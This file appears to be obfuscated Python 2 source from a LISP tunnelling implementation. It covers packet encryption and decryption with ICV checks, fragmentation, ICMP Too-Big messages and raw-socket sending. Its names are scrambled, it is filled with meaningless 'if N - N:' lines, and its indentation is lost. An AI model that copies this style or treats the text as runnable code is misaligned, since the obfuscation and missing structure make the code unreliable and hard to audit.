if 14 - 14: IiII . IiII % ooOoO0o
if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
self . packet = ooo + O0OO0ooO00 + oOOOoo00oO + self . packet
return ( self )
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
def cipher_pad ( self , packet ) :
iI1 = len ( packet )
if ( ( iI1 % 16 ) != 0 ) :
i1I1iiii1Ii11 = ( ( iI1 / 16 ) + 1 ) * 16
packet = packet . ljust ( i1I1iiii1Ii11 )
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
return ( packet )
if 6 - 6: oO0o . I11i
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
def encrypt ( self , key , addr_str ) :
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
if 50 - 50: oO0o % i1IIi * O0
if 4 - 4: iIii1I11I1II1 . i1IIi
if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
ii1i1II = self . cipher_pad ( self . packet )
oo0O = key . get_iv ( )
if 100 - 100: OoooooooOO - O0 . I11i / I11i + II111iiii * OoOoOO00
Oo0OO0000oooo = lisp_get_timestamp ( )
i11111 = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
o0o00OoOo0 = chacha . ChaCha ( key . encrypt_key , oo0O ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
try :
o0OO0ooOOO = AES . new ( oo0O0000O0 , AES . MODE_GCM , oo0O )
o0o00OoOo0 = o0OO0ooOOO . encrypt
i11111 = o0OO0ooOOO . digest
except :
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
if 44 - 44: Ii1I * ooOoO0o / OoOoOO00
else :
oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
o0o00OoOo0 = AES . new ( oo0O0000O0 , AES . MODE_CBC , oo0O ) . encrypt
if 69 - 69: ooOoO0o . OOooOOo - I1IiiI
if 29 - 29: i11iIiiIii . I1ii11iIi11i / I1IiiI . OOooOOo + i11iIiiIii
i1I1i = o0o00OoOo0 ( ii1i1II )
if 9 - 9: OoooooooOO * I1ii11iIi11i
if ( i1I1i == None ) : return ( [ self . packet , False ] )
Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 9 - 9: Oo0Ooo + iII111i
if 64 - 64: O0 * I1IiiI / I1IiiI
if 57 - 57: I1ii11iIi11i / OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
if 96 - 96: oO0o % i1IIi / o0oOOo0O0Ooo
if ( i11111 != None ) : i1I1i += i11111 ( )
if 13 - 13: II111iiii - Oo0Ooo % i11iIiiIii + iII111i
if 88 - 88: O0 . oO0o % I1IiiI
if 10 - 10: I1IiiI + O0
if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
if 31 - 31: i11iIiiIii * OoOoOO00
self . lisp_header . key_id ( key . key_id )
oOOOoo00oO = self . lisp_header . encode ( )
if 69 - 69: i11iIiiIii
ooO = key . do_icv ( oOOOoo00oO + oo0O + i1I1i , oo0O )
if 84 - 84: iIii1I11I1II1 . ooOoO0o + iII111i
O00OOOo0Oo0 = 4 if ( key . do_poly ) else 8
if 55 - 55: OOooOOo / OoOoOO00 * OOooOOo
IIIiiiI1Ii1 = bold ( "Encrypt" , False )
oo0O0OO0Oo = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
oO00o0oO0O = "poly" if key . do_poly else "sha256"
oO00o0oO0O = bold ( oO00o0oO0O , False )
iI11Iii1I = "ICV({}): 0x{}...{}" . format ( oO00o0oO0O , ooO [ 0 : O00OOOo0Oo0 ] , ooO [ - O00OOOo0Oo0 : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( IIIiiiI1Ii1 , key . key_id , addr_str , iI11Iii1I , oo0O0OO0Oo , Oo0OO0000oooo ) )
if 62 - 62: IiII . O0 . iIii1I11I1II1
if 94 - 94: ooOoO0o % I11i % i1IIi
ooO = int ( ooO , 16 )
if ( key . do_poly ) :
o0OoOo0o0O00 = byte_swap_64 ( ( ooO >> 64 ) & LISP_8_64_MASK )
I1IiiIi11 = byte_swap_64 ( ooO & LISP_8_64_MASK )
ooO = struct . pack ( "QQ" , o0OoOo0o0O00 , I1IiiIi11 )
else :
o0OoOo0o0O00 = byte_swap_64 ( ( ooO >> 96 ) & LISP_8_64_MASK )
I1IiiIi11 = byte_swap_64 ( ( ooO >> 32 ) & LISP_8_64_MASK )
I1i11IIIi = socket . htonl ( ooO & 0xffffffff )
ooO = struct . pack ( "QQI" , o0OoOo0o0O00 , I1IiiIi11 , I1i11IIIi )
if 19 - 19: oO0o * iII111i + OoOoOO00 - oO0o + I1ii11iIi11i
if 14 - 14: OoO0O00
return ( [ oo0O + i1I1i + ooO , True ] )
if 38 - 38: O0
if 79 - 79: i1IIi . oO0o
def decrypt ( self , packet , header_length , key , addr_str ) :
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
if ( key . do_poly ) :
o0OoOo0o0O00 , I1IiiIi11 = struct . unpack ( "QQ" , packet [ - 16 : : ] )
iI = byte_swap_64 ( o0OoOo0o0O00 ) << 64
iI |= byte_swap_64 ( I1IiiIi11 )
iI = lisp_hex_string ( iI ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
O00OOOo0Oo0 = 4
o00oo = bold ( "poly" , False )
else :
o0OoOo0o0O00 , I1IiiIi11 , I1i11IIIi = struct . unpack ( "QQI" , packet [ - 20 : : ] )
iI = byte_swap_64 ( o0OoOo0o0O00 ) << 96
iI |= byte_swap_64 ( I1IiiIi11 ) << 32
iI |= socket . htonl ( I1i11IIIi )
iI = lisp_hex_string ( iI ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
O00OOOo0Oo0 = 8
o00oo = bold ( "sha" , False )
if 78 - 78: IiII - I11i % O0 - OOooOOo % OoO0O00
oOOOoo00oO = self . lisp_header . encode ( )
if 43 - 43: OoO0O00
if 90 - 90: OoooooooOO + O0 + I1ii11iIi11i / I11i / Ii1I * I1ii11iIi11i
if 100 - 100: I11i
if 82 - 82: iIii1I11I1II1
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
iIiiII = 8
oo0O0OO0Oo = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
iIiiII = 12
oo0O0OO0Oo = bold ( "aes-gcm" , False )
else :
iIiiII = 16
oo0O0OO0Oo = bold ( "aes-cbc" , False )
if 13 - 13: II111iiii
oo0O = packet [ 0 : iIiiII ]
if 55 - 55: Oo0Ooo % i1IIi * I11i
if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
if 63 - 63: iIii1I11I1II1 / ooOoO0o
if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
iI1ii = key . do_icv ( oOOOoo00oO + packet , oo0O )
if 61 - 61: Oo0Ooo * i1IIi . OoooooooOO
iIIiI = "0x{}...{}" . format ( iI [ 0 : O00OOOo0Oo0 ] , iI [ - O00OOOo0Oo0 : : ] )
O0O0O0OO00oo = "0x{}...{}" . format ( iI1ii [ 0 : O00OOOo0Oo0 ] , iI1ii [ - O00OOOo0Oo0 : : ] )
if 39 - 39: IiII % OoOoOO00 * I1ii11iIi11i - OoooooooOO - Oo0Ooo
if ( iI1ii != iI ) :
self . packet_error = "ICV-error"
Oo0 = oo0O0OO0Oo + "/" + o00oo
oOOO = bold ( "ICV failed ({})" . format ( Oo0 ) , False )
iI11Iii1I = "packet-ICV {} != computed-ICV {}" . format ( iIIiI , O0O0O0OO00oo )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( oOOO , red ( addr_str , False ) ,
# OOooOOo + iII111i % iIii1I11I1II1 - I1ii11iIi11i
self . udp_sport , key . key_id , iI11Iii1I ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
if 33 - 33: OoOoOO00 / OoO0O00
if 47 - 47: iII111i + O0 / II111iiii * I1IiiI - OoooooooOO . Ii1I
if 28 - 28: oO0o . oO0o . iIii1I11I1II1 . OOooOOo . I1ii11iIi11i * i11iIiiIii
if 72 - 72: I11i
if 26 - 26: IiII % Oo0Ooo
if 72 - 72: O0 + o0oOOo0O0Ooo + I1IiiI / Oo0Ooo
lisp_retry_decap_keys ( addr_str , oOOOoo00oO + packet , oo0O , iI )
return ( [ None , False ] )
if 83 - 83: IiII - I1IiiI . Ii1I
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
if 5 - 5: i11iIiiIii * iII111i - Ii1I - I1ii11iIi11i - i1IIi + iII111i
if 4 - 4: ooOoO0o + O0 . i1IIi * I1ii11iIi11i - o0oOOo0O0Ooo
if 42 - 42: o0oOOo0O0Ooo * OoOoOO00 . OoO0O00 - iII111i / II111iiii
packet = packet [ iIiiII : : ]
if 25 - 25: Oo0Ooo % OoOoOO00
if 75 - 75: i1IIi
if 74 - 74: Oo0Ooo + I1Ii111 - oO0o - OoO0O00 + iII111i - iIii1I11I1II1
if 54 - 54: I1ii11iIi11i + II111iiii . I1IiiI / OoO0O00 . ooOoO0o
Oo0OO0000oooo = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
O00oooO00oo = chacha . ChaCha ( key . encrypt_key , oo0O ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
try :
O00oooO00oo = AES . new ( oo0O0000O0 , AES . MODE_GCM , oo0O ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
if 44 - 44: iIii1I11I1II1 * I1Ii111 * Oo0Ooo * I1ii11iIi11i + I11i
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
if 12 - 12: I1ii11iIi11i * ooOoO0o - I11i . OoO0O00 + OoO0O00 + iII111i
oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
O00oooO00oo = AES . new ( oo0O0000O0 , AES . MODE_CBC , oo0O ) . decrypt
if 29 - 29: OoooooooOO . I1Ii111 % I1Ii111
if 9 - 9: Oo0Ooo - Oo0Ooo - o0oOOo0O0Ooo + I1Ii111 - II111iiii . I1IiiI
O0Ooooo0 = O00oooO00oo ( packet )
Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 74 - 74: o0oOOo0O0Ooo / oO0o - II111iiii . II111iiii . IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
if 3 - 3: I1ii11iIi11i * I11i
IIIiiiI1Ii1 = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
oO00o0oO0O = "poly" if key . do_poly else "sha256"
oO00o0oO0O = bold ( oO00o0oO0O , False )
iI11Iii1I = "ICV({}): {}" . format ( oO00o0oO0O , iIIiI )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( IIIiiiI1Ii1 , key . key_id , addr_str , iI11Iii1I , oo0O0OO0Oo , Oo0OO0000oooo ) )
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
if 74 - 74: Oo0Ooo
if 8 - 8: I1IiiI % II111iiii - o0oOOo0O0Ooo - I11i % I1IiiI
if 93 - 93: Ii1I * iII111i / OOooOOo
if 88 - 88: oO0o
if 1 - 1: Oo0Ooo
if 95 - 95: OoooooooOO / I11i % OoooooooOO / ooOoO0o * IiII
self . packet = self . packet [ 0 : header_length ]
return ( [ O0Ooooo0 , True ] )
if 75 - 75: O0
if 56 - 56: OoO0O00 / II111iiii
def fragment_outer ( self , outer_hdr , inner_packet ) :
IIIiiiiI1 = 1000
if 40 - 40: O0 + IiII . Ii1I
if 29 - 29: OOooOOo / OoOoOO00 . iIii1I11I1II1 / I11i % OoOoOO00 % iII111i
if 49 - 49: II111iiii / IiII - Ii1I
if 7 - 7: I1IiiI / OoO0O00 + I1Ii111 + I11i / I1IiiI
if 82 - 82: I1ii11iIi11i + OoooooooOO
IIiIi11i111II = [ ]
i1 = 0
iI1 = len ( inner_packet )
while ( i1 < iI1 ) :
Iii1I = inner_packet [ i1 : : ]
if ( len ( Iii1I ) > IIIiiiiI1 ) : Iii1I = Iii1I [ 0 : IIIiiiiI1 ]
IIiIi11i111II . append ( Iii1I )
i1 += len ( Iii1I )
if 52 - 52: OoooooooOO / IiII - i1IIi
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
if 31 - 31: i1IIi % II111iiii
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
i1I = [ ]
i1 = 0
for Iii1I in IIiIi11i111II :
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
iIIi1 = i1 if ( Iii1I == IIiIi11i111II [ - 1 ] ) else 0x2000 + i1
iIIi1 = socket . htons ( iIIi1 )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , iIIi1 ) + outer_hdr [ 8 : : ]
if 76 - 76: I1IiiI - I1IiiI - o0oOOo0O0Ooo % ooOoO0o * O0
if 11 - 11: Ii1I + I11i . OoO0O00 . i11iIiiIii * OoO0O00
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
if 53 - 53: OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
o0000oO = socket . htons ( len ( Iii1I ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , o0000oO ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
i1I . append ( outer_hdr + Iii1I )
i1 += len ( Iii1I ) / 8
if 83 - 83: OoO0O00
return ( i1I )
if 16 - 16: ooOoO0o
if 32 - 32: o0oOOo0O0Ooo % I1IiiI
def send_icmp_too_big ( self , inner_packet ) :
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
if 7 - 7: Oo0Ooo . i1IIi - oO0o
o0O0oO0 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( o0O0oO0 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
if 93 - 93: IiII % I1ii11iIi11i
return ( False )
if 31 - 31: II111iiii + OOooOOo - OoooooooOO . I11i
if 28 - 28: Ii1I . I1ii11iIi11i
if 77 - 77: I1ii11iIi11i % II111iiii
if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
if 90 - 90: o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
if 32 - 32: IiII - ooOoO0o * iII111i * I11i
if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
if 94 - 94: I11i / OoO0O00 . o0oOOo0O0Ooo
if 1 - 1: Oo0Ooo . II111iiii
if 93 - 93: II111iiii . i11iIiiIii + II111iiii % oO0o
if 98 - 98: I1Ii111 * oO0o * OoOoOO00 + Ii1I * iII111i
if 4 - 4: IiII
if 16 - 16: iIii1I11I1II1 * iII111i + oO0o . O0 . o0oOOo0O0Ooo
oo00o00O0 = socket . htons ( 1400 )
O0o0oo0oOO0oO = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , oo00o00O0 )
O0o0oo0oOO0oO += inner_packet [ 0 : 20 + 8 ]
O0o0oo0oOO0oO = lisp_icmp_checksum ( O0o0oo0oOO0oO )
if 52 - 52: iII111i + O0 % o0oOOo0O0Ooo % O0 % II111iiii + OoooooooOO
if 51 - 51: iII111i % i11iIiiIii
if 28 - 28: I1ii11iIi11i + I1ii11iIi11i % OoOoOO00
if 12 - 12: I11i
if 19 - 19: Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
IIi1I1 = inner_packet [ 12 : 16 ]
oO00o0oOoo = self . inner_source . print_address_no_iid ( )
oOO = self . outer_source . pack_address ( )
if 38 - 38: I11i . IiII - OoO0O00 . I1IiiI
if 65 - 65: I1Ii111
if 31 - 31: i11iIiiIii / OoOoOO00 % I1ii11iIi11i
if 44 - 44: II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
IIIIIiiI11i1 = socket . htons ( 20 + 36 )
iIiiIIi = struct . pack ( "BBHHHBBH" , 0x45 , 0 , IIIIIiiI11i1 , 0 , 0 , 32 , 1 , 0 ) + oOO + IIi1I1
iIiiIIi = lisp_ip_checksum ( iIiiIIi )
iIiiIIi = self . fix_outer_header ( iIiiIIi )
iIiiIIi += O0o0oo0oOO0oO
I11111ii1i = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( I11111ii1i , oO00o0oOoo ,
lisp_format_packet ( iIiiIIi ) ) )
if 78 - 78: I11i % Oo0Ooo + OoOoOO00 . I1ii11iIi11i % oO0o / Ii1I
try :
lisp_icmp_raw_socket . sendto ( iIiiIIi , ( oO00o0oOoo , 0 ) )
except socket . error , o0OoO00 :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( o0OoO00 ) )
return ( False )
if 37 - 37: oO0o % I1Ii111 % oO0o
if 14 - 14: OoO0O00 / I1IiiI
if 66 - 66: Oo0Ooo / i11iIiiIii % ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
if 49 - 49: Ii1I + II111iiii / oO0o - OoOoOO00 % OoOoOO00 + I1IiiI
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
if 54 - 54: ooOoO0o % Oo0Ooo - OOooOOo
ii1i1II = self . fix_outer_header ( self . packet )
if 16 - 16: I1ii11iIi11i * iII111i / I11i
if 46 - 46: II111iiii
if 13 - 13: IiII + II111iiii % I1IiiI
if 30 - 30: OoooooooOO - i11iIiiIii + oO0o / Oo0Ooo - i11iIiiIii
if 74 - 74: O0 . I11i
if 64 - 64: ooOoO0o / i1IIi % iII111i
iI1 = len ( ii1i1II )
if ( iI1 <= 1500 ) : return ( [ ii1i1II ] , "Fragment-None" )
if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
ii1i1II = self . packet
if 99 - 99: I1Ii111
if 75 - 75: ooOoO0o . OOooOOo / IiII
if 84 - 84: OoooooooOO . I1IiiI / o0oOOo0O0Ooo
if 86 - 86: Oo0Ooo % OoOoOO00
if 77 - 77: Ii1I % OOooOOo / oO0o
if ( self . inner_version != 4 ) :
OOoOo = random . randint ( 0 , 0xffff )
Iiiiiii11IIiI = ii1i1II [ 0 : 4 ] + struct . pack ( "H" , OOoOo ) + ii1i1II [ 6 : 20 ]
oOOO0o = ii1i1II [ 20 : : ]
i1I = self . fragment_outer ( Iiiiiii11IIiI , oOOO0o )
return ( i1I , "Fragment-Outer" )
if 70 - 70: i11iIiiIii / ooOoO0o * I1ii11iIi11i - i1IIi + ooOoO0o
if 37 - 37: OOooOOo / i11iIiiIii
if 63 - 63: OoO0O00 + ooOoO0o
if 3 - 3: OoOoOO00 - I1Ii111 / oO0o . O0 * ooOoO0o / I1ii11iIi11i
if 18 - 18: Ii1I
o0OOoO = 56 if ( self . outer_version == 6 ) else 36
Iiiiiii11IIiI = ii1i1II [ 0 : o0OOoO ]
I1iII1II1I1ii = ii1i1II [ o0OOoO : o0OOoO + 20 ]
oOOO0o = ii1i1II [ o0OOoO + 20 : : ]
if 54 - 54: OoooooooOO + Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
i111IiIi1 = struct . unpack ( "H" , I1iII1II1I1ii [ 6 : 8 ] ) [ 0 ]
i111IiIi1 = socket . ntohs ( i111IiIi1 )
if ( i111IiIi1 & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
iii1111iIi1i1 = ii1i1II [ o0OOoO : : ]
if ( self . send_icmp_too_big ( iii1111iIi1i1 ) ) : return ( [ ] , None )
if 65 - 65: OoOoOO00 . II111iiii % iII111i + Ii1I
if ( lisp_ignore_df_bit ) :
i111IiIi1 &= ~ 0x4000
else :
IIIiii11 = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( IIIiii11 ) )
return ( [ ] , "Fragment-None-DF-bit" )
if 12 - 12: I1IiiI + I1Ii111
if 80 - 80: oO0o . O0
if 90 - 90: II111iiii / OoO0O00 / Ii1I
i1 = 0
iI1 = len ( oOOO0o )
i1I = [ ]
while ( i1 < iI1 ) :
i1I . append ( oOOO0o [ i1 : i1 + 1400 ] )
i1 += 1400
if 70 - 70: Ii1I - II111iiii . Oo0Ooo / Oo0Ooo
if 30 - 30: oO0o . OoO0O00 + I11i / iIii1I11I1II1 % Oo0Ooo / oO0o
if 3 - 3: I1ii11iIi11i / II111iiii
if 73 - 73: OoO0O00 * OoooooooOO - OoooooooOO + I1IiiI * Oo0Ooo
if 87 - 87: o0oOOo0O0Ooo / IiII / i11iIiiIii
IIiIi11i111II = i1I
i1I = [ ]
ooo00 = True if i111IiIi1 & 0x2000 else False
i111IiIi1 = ( i111IiIi1 & 0x1fff ) * 8
for Iii1I in IIiIi11i111II :
if 65 - 65: I1Ii111 + iII111i * iII111i
if 79 - 79: i1IIi / Oo0Ooo - I1IiiI . O0
if 56 - 56: IiII % O0 * i1IIi - II111iiii
if 74 - 74: i1IIi - OoOoOO00 % oO0o . O0 - OoooooooOO
oOooOOOO0oOo = i111IiIi1 / 8
if ( ooo00 ) :
oOooOOOO0oOo |= 0x2000
elif ( Iii1I != IIiIi11i111II [ - 1 ] ) :
oOooOOOO0oOo |= 0x2000
if 12 - 12: OoooooooOO
oOooOOOO0oOo = socket . htons ( oOooOOOO0oOo )
I1iII1II1I1ii = I1iII1II1I1ii [ 0 : 6 ] + struct . pack ( "H" , oOooOOOO0oOo ) + I1iII1II1I1ii [ 8 : : ]
if 55 - 55: I1ii11iIi11i + I1ii11iIi11i
if 87 - 87: IiII
if 78 - 78: oO0o % OoOoOO00
if 1 - 1: OoOoOO00 - o0oOOo0O0Ooo / ooOoO0o - IiII / i1IIi
if 28 - 28: OoO0O00 / I1Ii111 * I1IiiI + ooOoO0o
if 48 - 48: O0
iI1 = len ( Iii1I )
i111IiIi1 += iI1
o0000oO = socket . htons ( iI1 + 20 )
I1iII1II1I1ii = I1iII1II1I1ii [ 0 : 2 ] + struct . pack ( "H" , o0000oO ) + I1iII1II1I1ii [ 4 : 10 ] + struct . pack ( "H" , 0 ) + I1iII1II1I1ii [ 12 : : ]
if 44 - 44: OoO0O00 * oO0o
I1iII1II1I1ii = lisp_ip_checksum ( I1iII1II1I1ii )
o0oOoOooOOo = I1iII1II1I1ii + Iii1I
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
if 27 - 27: IiII + iIii1I11I1II1 / Oo0Ooo + OoO0O00 % Oo0Ooo + OoO0O00
if 77 - 77: Oo0Ooo * ooOoO0o % Ii1I
if 2 - 2: I11i / Oo0Ooo / Ii1I / I1ii11iIi11i / OoooooooOO
if 22 - 22: iIii1I11I1II1 * I1IiiI / I11i + OoOoOO00
iI1 = len ( o0oOoOooOOo )
if ( self . outer_version == 4 ) :
o0000oO = iI1 + o0OOoO
iI1 += 16
Iiiiiii11IIiI = Iiiiiii11IIiI [ 0 : 2 ] + struct . pack ( "H" , o0000oO ) + Iiiiiii11IIiI [ 4 : : ]
if 98 - 98: OOooOOo
Iiiiiii11IIiI = lisp_ip_checksum ( Iiiiiii11IIiI )
o0oOoOooOOo = Iiiiiii11IIiI + o0oOoOooOOo
o0oOoOooOOo = self . fix_outer_header ( o0oOoOooOOo )
if 69 - 69: II111iiii + Oo0Ooo - oO0o . Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1
if 75 - 75: OoO0O00 % OoooooooOO
if 16 - 16: O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
iIiI1I = o0OOoO - 12
o0000oO = socket . htons ( iI1 )
o0oOoOooOOo = o0oOoOooOOo [ 0 : iIiI1I ] + struct . pack ( "H" , o0000oO ) + o0oOoOooOOo [ iIiI1I + 2 : : ]
if 2 - 2: o0oOOo0O0Ooo . Ii1I % OoOoOO00
i1I . append ( o0oOoOooOOo )
if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
return ( i1I , "Fragment-Inner" )
if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
if 65 - 65: OOooOOo - OoO0O00 % i11iIiiIii
def fix_outer_header ( self , packet ) :
if 58 - 58: iII111i
if 2 - 2: II111iiii + i1IIi
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
if 44 - 44: OoO0O00 + I11i % OoO0O00 + i1IIi + iII111i + O0
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
return ( packet )
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
dest = dest . print_address_no_iid ( )
i1I , ooo000 = self . fragment ( )
if 82 - 82: iIii1I11I1II1 * OoooooooOO
for o0oOoOooOOo in i1I :
if ( len ( i1I ) != 1 ) :
self . packet = o0oOoOooOOo
self . print_packet ( ooo000 , True )
if 50 - 50: I1Ii111 - II111iiii
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
try : lisp_raw_socket . sendto ( o0oOoOooOOo , ( dest , 0 ) )
except socket . error , o0OoO00 :
lprint ( "socket.sendto() failed: {}" . format ( o0OoO00 ) )
if 16 - 16: IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
if 22 - 22: I1Ii111
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 23 - 23: O0
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 41 - 41: i1IIi . OOooOOo / ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
